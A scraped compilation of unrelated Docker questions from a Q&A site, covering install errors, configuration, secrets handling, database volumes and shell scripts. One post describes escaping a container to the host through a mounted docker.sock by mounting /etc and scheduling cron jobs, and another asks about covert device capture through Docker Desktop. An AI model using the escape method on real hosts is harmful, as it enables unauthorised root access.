getting error while installing docker: “docker-ce : Depends: containerd.io (>= 1.2.2-3) but it is not going to be installed “

i am trying to install docker on my ubuntu 18.04, but i am getting this error while installing docker. The error says: The following packages have unmet dependencies: docker-ce : Depends: containerd.io (>= 1.2.2-3) but it is not going to be installed, E: Unable to correct problems, you have held broken packages.

Can an intruder use a Docker Desktop installation to run keyboard or other capture (audio/video, network) on a Windows 10 system?

I’m not looking for a howto for an exploit.

“lostvicking” in a Docker forums post seems to be trying to mount their webcam device into a docker container but does not succeed:

Is it possible to forward webcam video to a docker image from Windows 10? I’ve seen the same question asked for Linux and the solution seems to be to use:

docker run –privileged -v /dev/video0:/dev/video0

Is there a similar trick when I’m running Docker in Windows 10? Presumably there is no equivalent mount point that can be bound?

This made me wonder if Docker Desktop could facilitate installation of keyboard capture, or other capture (audiovideo, network), either by an adversarial user with physical access to a shared machine (college computer lab; internet cafe) or an online intruder. Or are windows usb devices not sharable with docker containers via Docker Desktop?

Is this possible?

Is there an obvious countermeasure, besides uninstalling Docker Desktop?

Obviously, someone with physical access to a windows machine can instead install native windows malware. This question involves whether Docker Desktop adds an additional, less monitored vector.

systemd ignores docker configuration file at /etc/docker/daemon.json

Docker service will not use /etc/docker/daemon.json configuration during startup.

user@host:~$   cat  /etc/docker/daemon.json {   "exec-opts": ["native.cgroupdriver=systemd"],   "log-driver": "json-file",   "log-opts": {     "max-size": "100m"   },   "storage-driver": "overlay2" } 

I have to use systemctl daemon-reload and systemctl restart docker after every reboot, then the docker service will use daemon.json file to override default settings.

Is there a way to make this persistent ?

Is storing a JWT secret as docker env variable acceptable?

I understand how JWTs work and that with my secret anyone can issue new tokens. I control the server that my node website runs on and am considering different options for hosting the key.

  1. In code – Not acceptable because my code is in a github repo
  2. ENV variable – seperate secrets for dev and production while not leaking to github
  3. Store in database – Seems more like #2 with more work, being that an on-machine attacker can find access to the db anyways

2 looks like the best method for a simple website (no super sensitive user info like credit cards or SSNs). Is this a good solution?

MariaDB docker “Can’t init tc log” on start up when using mounted storage

I am initializing a new MariaDB database. Running docker with a volume to my home directory allows MariaDB to start up just fine:

docker run -it --rm --name mymaria \   -e MYSQL_RANDOM_ROOT_PASSWORD=yes \   -e MYSQL_PASSWORD=p@$  $  w0rd \   -e MYSQL_DATABASE=myapp \   -e MYSQL_USER=myapp \   -v /home/myuser/mysql:/var/lib/mysql \   mariadb:10.2 

However, running the mariadb container with a volume via a mounted directory like so:

docker run -it --rm --name mymaria \   -e MYSQL_RANDOM_ROOT_PASSWORD=yes \   -e MYSQL_PASSWORD=p@$  $  w0rd \   -e MYSQL_DATABASE=myapp \   -e MYSQL_USER=myapp \   -v /mnt/storage/mysql:/var/lib/mysql \   mariadb:10.2 

This configuration returns this from the docker logs output:

Initializing database 2019-09-23  5:12:13 139724696503616 [ERROR] Can't init tc log 2019-09-23  5:12:13 139724696503616 [ERROR] Aborting   Installation of system tables failed! ... 

Simply removing tc.log as some folks have suggested does not work. Restarting mariadb will rewrite tc.log back into the volume /var/lib/mysql.

Perhaps this is a permissions issue? I feel like I’ve tried every combination of chown with each directory. I do notice that docker appears to change the mounted volume /mnt/storage/mysql to drwxr-xr-x 2 systemd-coredump root 176 Sep 22 23:11 mysql which I find odd.

I encounter this issue only with the 10.2 tag and not the latest. However, for an orchestration I’m working on, it suggests mariadb:10.2.

Executing the Docker Command Without Sudo

I found the solution that will perfectly working on ubuntu 18.4.follow the step to solve I thing its 100% working .

If you are already logged in then to add the user to docker group run below command:

step1 :sudo usermod -aG docker $ USER

To apply the membership run below command or again login

step2: su - $ USER

The output should be:

username adm cdrom sudo dip plugdev lpadmin sambashare docker.

for checking run any commond of docker:sudo docker images

Permissions issue in Docker SQL Server 2017 while restoring certificate

Docker SQL Server 2017 container @latest. Using master database.

The error I am facing is the following:

[S00019][15208] The certificate, asymmetric key, or private key file is not valid or does not exist; or you do not have permissions for it.

The closest thing I have found to this exact question is this issue on Stackoverflow. However the answer doesn’t work for me. This question has a similar answer.

I have also tried the instructions here, and here.

So going through the parts of the error:

  1. I have recreated the files twice, so I don’t think it’s the “invalid” part. And it’s obviously not the “does not exist” part (if I put in the wrong password, it tells me it’s the wrong password).
  2. I have backed up and restored the SMK and Master Key without issue, so I don’t think it’s the permissions issue. The files have the exact same permissions.

I can’t get the certificate to restore no matter what I try. I have searched the GitHub issues to no avail so I don’t think it’s a bug. I must be doing something wrong.

Relevant code:

--on Prod BACKUP CERTIFICATE sqlserver_backup_cert TO FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.cer'     WITH PRIVATE KEY ( FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.key' ,     ENCRYPTION BY PASSWORD = 'foobar') GO 
--on Test CREATE CERTIFICATE sqlserver_backup_cert FROM FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.crt'   WITH PRIVATE KEY (     FILE = '/var/opt/mssql/certs/sqlserver_backup_cert.key',     DECRYPTION BY PASSWORD = 'foobar'   ) GO 

It’s noteworthy that /var/opt/mssql/certs is a Docker volume. However I have also tried creating my own directory inside the container and using docker cp. No change.

How to execute a command directly on the host system through docker.sock in Docker container?

I’ve been studying Docker security and examining ways of escaping from container to host.

Suppose Docker sock is mounted into the container at /var/run/docker.sock, so that Docker client (client) can send commands to Docker daemon (dockerd).

To execute commands on the host, I could run another container and mount /etc/ into it (read-write) to schedule CRON jobs (is it possible to mount /etc/ into the current container?).

Besides the above, what other methods are there for executing commands on the host through /var/run/docker.sock?

Alternative to Docker that is less restrictive for maintaining package dependencies

I work on robotics on ROS running with Xenial, but this applies to any application running on Ubuntu. With a team of engineers, its rather hard to keep everyone’s test station uniform in package versions. A while back, we had a testbed break completely since a new update/upgrade changed much of a package functionality.

I want to avoid this and have a solution that allows me to duplicate these testbeds with ease.

I realize that Docker is the popular solution for this, but the container solution is a little bit too restrictive for my needs. I don’t mind reinstalling drivers and etc and I’m finding it cumbersome to deal with Docker specific issues in getting my original testbed running(especially as it requires multi-containers).

Is there a solution available that can achieve my needs without going as far as a container like Docker?

The dumb method would just be clone my entire testbed…maybe that’s still the best for me?

#!/bin/bash -i when to use it in a docker file

I need to understand when I need to use the -i .

It’s a convention so the *nix shell knows what kind of interpreter to run.

For example, older flavors of ATT defaulted to sh (the Bourne shell), while older versions of BSD defaulted to csh (the C shell).

Even today (where most systems run bash, the “Bourne Again Shell”), scripts can be in bash, python, perl, ruby, PHP, etc, etc. For example, you might see #!/bin/perl or #!/bin/perl5.